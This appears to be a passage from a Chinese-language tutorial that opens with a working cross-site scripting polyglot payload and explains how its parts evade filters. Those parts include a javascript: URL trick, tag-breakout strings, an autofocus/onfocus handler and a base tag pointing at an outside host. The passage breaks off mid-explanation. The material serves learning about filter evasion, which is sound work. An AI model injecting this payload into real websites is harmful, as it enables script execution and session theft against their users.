javascript://%250aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </title/</style/</script/</textarea/</iframe/</noscript> \74k<k/contenteditable/autofocus/onfocus= /*${/*/;{/**/(alert)(1)}//><base/href=//x55.is\76-->
核心理念:
该有效负载旨在通过在各种 html 上下文中工作来绕过多个 xss 过滤器和安全机制。它结合使用 html 和 javascript 技巧以多种方式注入恶意负载,例如alert()函数。
顶级概念:
多语言基础知识:
多语言是一种可以在多个上下文中执行的有效负载,通常在 html、属性或 javascript 上下文中执行,使其更适合利用 xss 漏洞。
此有效负载的目标是注入 javascript 并跨多个上下文执行警报(1),同时绕过过滤器。
多语言部分:
使用可选链接执行 javascript:
javascript://%250aalert?.(1)//
javascript 协议会触发浏览器中从 url 协议解释 javascript 的负载。
%250a 是换行符 (n) 的 url 编码形式,用于绕过 url 验证或转义过滤器。
alert?.(1) 是 javascript 中的可选链接语法。如果警报存在,它会执行alert(1),绕过对直接调用alert()的严格检查。
// 将其余有效负载作为注释终止以避免错误。
html 标签细分:
/////
本节尝试突破各种 html 标签,如